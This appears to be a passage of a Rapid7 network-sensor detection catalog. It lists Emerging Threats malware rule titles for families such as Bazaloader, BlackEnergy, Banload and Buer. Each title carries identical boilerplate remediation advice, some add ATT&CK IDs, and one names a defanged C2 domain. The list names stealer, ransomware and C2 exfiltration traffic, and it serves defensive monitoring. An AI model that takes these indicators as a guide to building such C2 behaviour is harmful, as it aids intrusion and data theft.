This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Ixeshe

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Likseput.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Likseput.A Checkin Windows Vista/7/8

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Momibot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Momibot Ping Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/PcClient.AA Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.PEx.942728546 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Pushdo.s Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Pushdo.s Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.RShot HTTP Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Sykipot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Sykipot Get Config Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Sykipot Put

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Trup.CX Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Vertexbot.A User-Agent (VERTEXNET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Xtrat Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backoff POS Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BackSwap Trojan C2 Domain Observed (debasuin .nl in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BadPatch CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BadRabbit Ransomware Activity Via WebDAV (cscc)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE BadRabbit Ransomware Activity Via WebDAV (infpub)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Baldr Stealer Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BalkanDoor CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BalkanDoor CnC Checkin - Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bamital checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bamital Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bamital Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bamital Headers - Likely CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bancos/Banker Info Stealer Post

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BandarChor/CryptON Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE BandarChor Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Banker.anv Generally Suspicious User-Agent (CustomExchangeBrowser)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker/Banbra Related HTTP Post-infection Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker/Banbra Variant POST via x-www-form-urlencoded

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (hhh)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (Ms)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (Mz)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (MzApp)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (WINDOWS_LOADS)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker PWS/Infostealer HTTP GET Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker Trojan (General) HTTP Checkin (vit)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload HTTP Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload HTTP Checkin Detected (envia.php)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload POST Checkin (dados)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload User-Agent Detected (ExampleDL)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BazaBackdoor Variant CnC Activity M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BazaLoader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BazaLoader CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bazaloader Variant Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bazaloader Variant Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BBSRAT GET request CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BBSRAT POST request CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bebloh connectivity check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bedep Connectivity Check M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bedep Connectivity Check M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bedep HTTP POST CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE BePush/Kilim CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE BePush/Kilim payload retrieval

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BestAntivirus2011 Fake AV reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Betabot Checkin 5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BF Botnet CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bifrose/Cycbot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bifrose/Cycbot Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BigLock Ransomware CnC Activity (id)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE BIOPASS RAT Go Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BIOPASS RAT Python Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bitcoin variant Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bitter APT Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BITTERBUG Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bitter RAT HTTP CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bitter RAT HTTP CnC Beacon M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE BKDR_BTMINE.MNR BitCoin Miner Retrieving New Malware From Server

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BKDR_BTMINE.MNR BitCoin Miner Retrieving Server IP Addresses

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BKDR_BTMINE.MNR BitCoin Miner Server Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BKDR_SLOTH.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackbeard Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackenergy Bot Checkin to C&C

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackenergy Bot Checkin to C&C (2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackEnergy POST Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackEnergy v2 POST Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackEnergy v2.x HTTP Request with Encrypted Variables

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackEnergy v2.x Plugin Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackMatter CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackmoon/Banbra Configuration Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackmoon/Banbra Configuration Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackshadesRAT Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackTech Plead Encrypted Payload Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackTech/PLEAD TSCookie CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackTech/PLEAD TSCookie CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blaze/Supreme Bot Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blaze/Supreme Bot Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BleachGap Ransomware Checkin (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Blue Bot DDoS Blog Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blue Bot DDoS Logger Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blue Bot DDoS Proxy Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blue Bot DDoS Target Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bolek HTTP Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Book of Eli CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bookworm CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bookworm CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bossabot DDoS tool RFI attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bot Backdoor Checkin/registration Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BOUNCEBEAM Backdoor CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bravix Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Brazilian Banker SSL Cert

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bredolab CnC URL Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bredolab Downloader Communicating With Controller (1)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BroBot POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Brontok/Joseray User-Agent Detected (Joseray.A3 Browser)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Brontok User-Agent Detected (Brontok.A3 Browser)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Brontok User-Agent Detected (Rivest)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BrushaLoader CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer - DomainInfo User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer Loader Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer Loader Successful Payload Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer Loader Update Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer Loader Update Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

